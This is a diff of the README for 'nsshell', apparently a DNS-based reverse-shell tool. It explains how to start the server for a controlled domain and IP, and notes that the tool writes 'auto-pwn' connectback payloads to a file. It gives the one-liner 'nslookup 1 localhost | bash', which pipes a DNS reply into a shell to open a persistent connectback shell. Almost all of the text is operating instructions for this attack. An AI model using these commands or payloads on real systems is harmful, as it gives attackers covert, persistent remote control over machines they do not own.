TheRook/nsshell/README.md

 Start:
-The tool needs to know which domain it has control over: sudo ./nsshell.py hack.com 123.123.123.112
+The tool needs to know which domain it has control over:

-...
+sudo ./nsshell.py host.com 123.123.123.112

-wrote connectback payloads to:payloads.txt
+**wrote connectback payloads to:payloads.txt**

 The file above contains a list of auto-pwns.
 Run one of the payloads and a persistent shell will be loaded over DNS.

+### install
+sudo make install

+### Run Server - localhost for testing
+sudo python nsshell.py localhost 127.0.0.1

+###Spawn Connectback shell- localhost for testing
+nslookup 1 localhost | bash

 That's all folks!

-## install
-sudo make install && echo $(which nsshell) && nsshell localhost 127.0.0.1

-spawn a connectback:
-nslookup 1 localhost | bash